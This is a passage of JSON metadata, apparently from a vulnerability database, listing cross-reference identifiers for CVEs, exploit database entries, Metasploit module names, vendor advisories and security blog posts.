"AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "AKB:A4BDBFB9-4493-4EF5-8C05-276721F6549F", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B4447AA8-BD5F-410D-A592-76FEEDA507EA", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545", "AKB:E152B863-E927-4417-BC7B-1472E48FD3A1", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1", "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A", "AKB:EF56F4A3-B95C-4CA0-9E19-BA58E1295785", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:FDF5A3A7-D224-432D-A61A-88CFCB4B9799"]}, {"type": "avleonov", "idList": ["AVLEONOV:C227E6D768CE965E884A2A9208D66579"]}, {"type": "canvas", "idList": ["BLUEKEEP", "BRIGHTMAIL_RESTORE", "EXIM_HEAP_OVERFLOW", "NETSCALER_TRAVERSAL_RCE", "OWA_RCE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685", "CARBONBLACK:B2094018923AC88282ED4B94CB24F28B"]}, {"type": "cert", "idList": ["VU:619785", "VU:849224", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0728", "CPAI-2018-0772", "CPAI-2018-1694", "CPAI-2019-0430", "CPAI-2019-0506", "CPAI-2019-0657", "CPAI-2019-0860", "CPAI-2019-1097", "CPAI-2019-1531", "CPAI-2019-1653", "CPAI-2019-1914", "CPAI-2020-0019", "CPAI-2020-0104", "CPAI-2020-0118", "CPAI-2020-0179", "CPAI-2020-0320", "CPAI-2020-0628", "CPAI-2020-0712"]}, {"type": "checkpoint_security", "idList": ["CPS:SK164716"]}, {"type": "chrome", "idList": ["GCSA-7741258004223335178"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:18E5825084F7681AD375ACB5B1270280", "CISA:3219D2E89DB1680D9EF6F22691FC5829", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:661993843C9F9A838ADA8B8B8B9412D1", 
"CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:779BA36AC3457391150C49F501628DF7", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:871444F0026579280090F0A0759442B1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:A5265FFF4C417EB767D82231D2D604B8", "CISA:E863981ED150C9E5F6666207FF8917D0"]}, {"type": "cisco", "idList": ["CISCO-SA-20200205-IOSXR-CDP-RCE"]}, {"type": "citrix", "idList": ["CTX267027", "CTX276688"]}, {"type": "cve", "idList": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-2555"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1274-1:2DD70", "DEBIAN:DSA-4110-1:E5F9E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-6789"]}, {"type": "dsquare", "idList": ["E-581", "E-686", "E-688"]}, {"type": "exploitdb", "idList": ["EDB-ID:42519", "EDB-ID:44571", "EDB-ID:46731", "EDB-ID:46904", "EDB-ID:47120", "EDB-ID:47297", "EDB-ID:47416", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:48320", "EDB-ID:48508", "EDB-ID:49038"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4639A09DD9AC0CEB700BE689515D2AE7"]}, {"type": "f5", "idList": ["F5:K25238311"]}, {"type": "fedora", "idList": ["FEDORA:3B593605DCC5", "FEDORA:C80A96015189"]}, {"type": "filippoio", "idList": ["FILIPPOIO:A761D20DF072FAFAF24F6BC3A68D6AF9"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:B394E05FC4834992E8F05135E3087CAD", "FIREEYE:BFB36D22F20651C632D25AA20588E904"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31", "316B3C3E-0E98-11E8-8D41-97657151F8C2"]}, {"type": "gentoo", "idList": ["GLSA-201803-01"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "03237B57-97DA-5A83-B4B2-869C01BC59F7", "05081BAE-6AEB-5206-8BEC-6D067EE4B660", 
"05283D8D-AE42-54D4-B0CC-85DEBC639859", "059DC199-E425-50EE-B5F5-E351E0323E69", "067A6222-57A8-52E2-887C-CA7ED4D9A4F4", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FE94331-DF7E-5791-BE22-DD1DF78E5A3C", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "10F73C81-91F0-5199-9C8E-432BF228C96A", "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "1504582F-1A1E-5CA1-A07C-FB05DECB01A9", "152D4F4D-1599-54AE-9A00-A593A379AE0A", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "1741E720-F85A-5179-AB8A-D6FA2E185092", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "190C90D2-4C97-59F5-B1A3-B33DC30ADA82", "19160D73-DC0F-5BE5-85CF-4C7465B538AF", "19F70587-89FB-5855-A578-0E55C3510C59", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "1FEBEBF0-4E44-56B3-8111-2B2357BDD6B6", "21D540EC-C4D0-5076-92B2-AA746AF7AEE4", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "26F1DC1C-5D5D-5D8B-8DDB-890968225F0B", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "28F1E5F0-F489-559C-A1C3-C14BC0D51B93", "28F899A8-D565-51D0-A9B5-5B2B631407EB", "291B5382-1EED-522B-869C-C2AFDC4AB400", "2AF9B196-507F-5F76-9363-5651035AE371", "2BE2BF2C-B78F-5C34-A4D4-484F0E6B6D9C", "2D3AD059-4772-527B-A78C-724AFA1B109F", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "2ED15233-2A01-53F8-A939-8A4D06481CF4", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "30863E3B-BC4C-5B00-B21E-E9C67ECF8BA9", "31DB22CD-3492-524F-9D26-035FC1086A71", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "350E6199-FA83-5A2F-91D3-19E2D2921801", "36AAE05E-CAAA-5F55-AA88-65599F1EAA1C", "370515CC-C819-5D01-917D-2DF4728A28F4", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "39093366-D071-5898-A67D-A99B956B6E73", 
"39732E15-7AF0-5FC2-851B-B63466C0F2F2", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "431446A1-D76F-5889-BBDD-1C55456A4D73", "4577EA1C-992F-5AA5-86B6-9749FBDFC45D", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "462438E9-2947-5006-9134-9BA0BCC1B262", "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "46FA259E-5429-580C-B1D5-D1F09EB90023", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49D58681-03E3-5607-8475-366F990C3706", "4B25D88E-3B3F-5756-B942-7244492EB7F4", "4C03A6F0-84D7-565A-B0D8-DE45D804A835", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4E477E4A-4794-5B4A-8706-915B06422C95", "504A0052-A0EB-53EA-AFC3-4E5EEC236795", "523F993F-2487-5C75-A910-22605D6D57D9", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "5562A10B-A754-5E2C-9FCA-88EA38C98CBD", "560405C4-4806-5173-B662-F9C3D776D8D4", "5B55C912-08F2-542D-B6F4-EE8AF664AEAC", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "6102FE6D-37F6-572D-8877-F3A0D49FC22D", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "63D5015A-CD15-54CF-A1CB-67AEEEFFB789", "6531DE99-76A6-5374-998A-30AC54C10711", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "66506397-D518-518F-B4A6-3C3F99602E30", "6787DC40-24C2-5626-B213-399038EFB0E9", "697CC4E5-B8C5-57DA-8E6E-C44C37811757", "6A34D376-A589-5117-B34C-668A898CD6F2", "6AF629CA-DC22-5740-AC2B-CA18189D299D", "6B67D619-5DD1-507C-9028-561DC01DC062", "6CA1F5F4-917A-534B-9ED6-6065C00689AF", "721C46F4-C390-5D23-B358-3D4B22959428", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "757B9105-ADEF-5B27-8B1F-A06AE0566065", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "78155987-ACB5-51CD-99EB-FF372456D94D", 
"796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "7F937E02-A1B2-5F78-B140-90BC298729D4", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "80F73667-B6DA-5D40-984F-3F104E58C6B4", "851959DE-3B5C-5317-868E-5D80E801E3B0", "88373793-9076-5F05-BDBB-635A7E1BD897", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "8C937DCD-4090-5A44-9361-4D9ECF545843", "8CBB7F58-891D-5105-B269-029C59A9C3C9", "92A57BC1-BAC9-5C0F-951A-E1FF05D87142", "92BBBF7B-026E-553A-883B-AEF503046C18", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "94095106-8E25-54E1-924C-2C3B4E99610F", "988A0BAB-669A-57AE-B432-564B2E378252", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9C32E281-E6FB-587D-9ECC-F961B7082D43", "9D170C46-A745-5692-BA84-67EBFEA037FF", "9FE15986-BAC9-5740-8189-23E26F8399D5", "A04C30E0-722D-5CF4-B80A-547C1C702024", "A1FEA8E3-60B5-5828-A65B-98AA56545D78", "A423A009-0EEA-569D-AFFE-89EC01F7CDF7", "A43D1B77-D6EF-5570-AF16-6320A544CE0A", "A48A7BCD-4B97-5BDB-A571-3B8DF0069FB9", "A4E7A7FA-3876-5263-8290-CAB45A4A2F1F", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "A839FA86-0873-592C-AA31-2C445B4C4F29", "A8BE443F-B43C-5460-9DBF-0E7C65078EF2", "A96AA4B1-C8BB-579A-8D24-BC5F3628A0A4", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "AAC2853C-A655-5E80-9262-A654102B874A", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "AE10BD2D-66B3-5C55-9296-FA884BA0CA27", "AE9D3A7C-7BEB-54EA-9C61-A03C494D5EDD", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "B41082A1-4177-53E2-A74C-8ABA13AA3E86", "B417316F-A794-5234-BC9E-475C438FC35C", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BC6A00C7-AE9A-533B-87DE-DD27240A818C", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "BE88205A-26D3-5EFE-B8CC-828EE7E33C86", 
"BE90B1DD-521D-540C-8554-5454779256A5", "BEDCA78A-B03B-5065-AB50-3AC902332B03", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C82E0A5A-3070-5ED4-A0CF-B3E342C5E0C1", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D07D56B4-40BB-511F-B7EA-EF5B1544D876", "D166D6FD-186D-5EE5-951A-8AB30D45EA32", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D4308421-E113-5104-8D37-4FB75AE2D7DC", "D4572C36-FAE8-5802-9B48-CF143220B909", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "D8BEFAC3-BA4E-5E7E-8553-B512E126AD53", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC044D23-6D59-5326-AB78-94633F024A74", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E2C6B714-1F75-5584-B0B3-280C3B36C014", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "EA2EA382-C5B7-54EF-8547-EDDD15EA1B85", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EBBEA4C3-D6F9-53AF-BBE9-D3438C945AB4", "EBF17036-7547-54B5-B0D6-B465FE6C9873", "EE2763B9-CDEA-5FAF-91CF-8B6902DD2E56", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F1CA855B-967C-5A5E-9256-FDDE87702713", "F2165DE4-7724-559C-A733-DE9F244DA408", "F22160B4-2E80-5B7D-8238-95D7833F6D73", 
"F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F775D2F3-FF1F-529F-B0F3-99AB6A801264", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBA74A16-061A-5741-B662-B77D2C6DF28F", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126"]}, {"type": "hackerone", "idList": ["H1:322935", "H1:518637", "H1:536130", "H1:541858", "H1:591295", "H1:632721"]}, {"type": "hivepro", "idList": ["HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "ibm", "idList": ["BBC19469EB9B90D82D15BF345DE6BD2F2984CAE6A5427AAEAFBF0699FD85D085"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51"]}, {"type": "kaspersky", "idList": ["KLA11460", "KLA11493", "KLA11639", "KLA11647", "KLA11664", "KLA11706", "KLA11720", "KLA11874", "KLA11875"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4019975092566820832", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:4482238198881011483", "KITPLOIT:5485948766090500662", "KITPLOIT:5528727998547000766", "KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", 
"KITPLOIT:6972580572774284552", "KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:58D4F859AA2566B4BCE221DB78B85548", "KREBS:92A33A0E1BB183F4EF513731C0304581", "KREBS:C93CCA23099AC250E702848B49677D5B", "KREBS:F9486A3FDB624FD485CEA4ECAFAF3CCA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/PULSE_SECURE_FILE_DISCLOSURE", "MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE", "MSF:EXPLOIT/MULTI/HTTP/CONFLUENCE_WIDGET_CONNECTOR", "MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE_BADATTRVAL", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE"]}, {"type": "mmpc", "idList": ["MMPC:9AAC6D759E6AD62F92B56B228C39C263"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0708", "MS:CVE-2019-0803", "MS:CVE-2019-1040", "MS:CVE-2020-0688", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065"]}, {"type": "mskb", "idList": ["KB4534273"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B", "MSRC:9FA59725E0E2287517314198EB45ED26"]}, {"type": "mssecure", "idList": ["MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:9AAC6D759E6AD62F92B56B228C39C263", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889920", "MYHACK58:62201993579", "MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201994853", "MYHACK58:62201995234", "MYHACK58:62201995523", 
"MYHACK58:62201995674", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["ALA_ALAS-2018-970.NASL", "COLDFUSION_WIN_APSB18-14.NASL", "DEBIAN_DLA-1274.NASL", "DEBIAN_DSA-4110.NASL", "EXIM_4_90_1.NASL", "FEDORA_2018-25A7BA3CB6.NASL", "FEDORA_2018-5AEC14E125.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "GENTOO_GLSA-201803-01.NASL", "OPENSUSE-2018-170.NASL", "SMB_NT_MS20_JAN_4528760.NASL", "SMB_NT_MS20_JAN_4534271.NASL", "SMB_NT_MS20_JAN_4534273.NASL", "SMB_NT_MS20_JAN_4534276.NASL", "SMB_NT_MS20_JAN_4534293.NASL", "SMB_NT_MS20_JAN_4534306.NASL", "UBUNTU_USN-3565-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108367", "OPENVAS:1361412562310108611", "OPENVAS:1361412562310108794", "OPENVAS:1361412562310140294", "OPENVAS:1361412562310704110", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815019", "OPENVAS:1361412562310815020", "OPENVAS:1361412562310815021", "OPENVAS:1361412562310815022", "OPENVAS:1361412562310815023", "OPENVAS:1361412562310815024", "OPENVAS:1361412562310815033", "OPENVAS:1361412562310815034", "OPENVAS:1361412562310815036", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054", "OPENVAS:1361412562310815085", "OPENVAS:1361412562310815086", "OPENVAS:1361412562310815087", "OPENVAS:1361412562310815088", "OPENVAS:1361412562310815205", "OPENVAS:1361412562310815206", "OPENVAS:1361412562310815207", "OPENVAS:1361412562310815208", "OPENVAS:1361412562310815210", "OPENVAS:1361412562310815740", "OPENVAS:1361412562310815741", "OPENVAS:1361412562310815742", "OPENVAS:1361412562310815743", "OPENVAS:1361412562310815744", "OPENVAS:1361412562310815745", "OPENVAS:1361412562310815748", "OPENVAS:1361412562310815749", "OPENVAS:1361412562310815750", "OPENVAS:1361412562310843448", "OPENVAS:1361412562310851706", "OPENVAS:1361412562310874147", "OPENVAS:1361412562310874151", "OPENVAS:1361412562310891274"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2016"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143821", 
"PACKETSTORM:152568", "PACKETSTORM:153133", "PACKETSTORM:153627", "PACKETSTORM:154176", "PACKETSTORM:154579", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:157207", "PACKETSTORM:157795", "PACKETSTORM:158056", "PACKETSTORM:160047"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:45B4EBB10CDE38B36A9C242F3D60C7A4", "QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:A28C30F71B1450A5D1A2C74AEBD22E6A", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1", "QUALYSBLOG:FD90A85F75806FE26BBC0970B56AFB9D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-6789"]}, {"type": "saint", "idList": ["SAINT:4A51F090FB88D7C0687C235D80825104", "SAINT:50889C53D3A04E98F4F7E31365C75978", "SAINT:7C1EF5B76FC3A237B68C699EF952633A", "SAINT:880C926D2511DE57F08789A66AFE11F2", "SAINT:9870FA2AA27A04C7E50DC7E0A2A344D0"]}, {"type": "schneier", "idList": ["SCHNEIER:431597F9B05B18D767EC2998B8C5DD99"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:67C82A057DBE22C60DC2677D52D52ECD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", "idList": ["SSV:96367"]}, {"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:0468-1"]}, {"type": "symantec", "idList": ["SMNTC-1411"]}, {"type": "talosblog", "idList": ["TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF", "TALOSBLOG:71D138211697B43CB345A133B54BC824", 
"TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:C41259322CA5338694B85978B0EA6FA5", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "thn", "idList": ["THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1BA2E3EE721856ECEE43B825656909B0", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:4D730B0E8FB7A8FA81D69770EF31795C", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:9B966D7333226606F54AD717A81F6D7E", "THN:F1F7A2FB2164F9A7A60AB12A3C71076A"]}, {"type": "threatpost", "idList": ["THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:06C5D9E6950186757AA989F2557336B3", "THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:170045B7C0BA198775BD78B7D00C824E", "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:20EAC8CBCC0B2A55B8195EB5B485B9D6", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "THREATPOST:24AD38597408C4E7757770D45345AEBA", "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", 
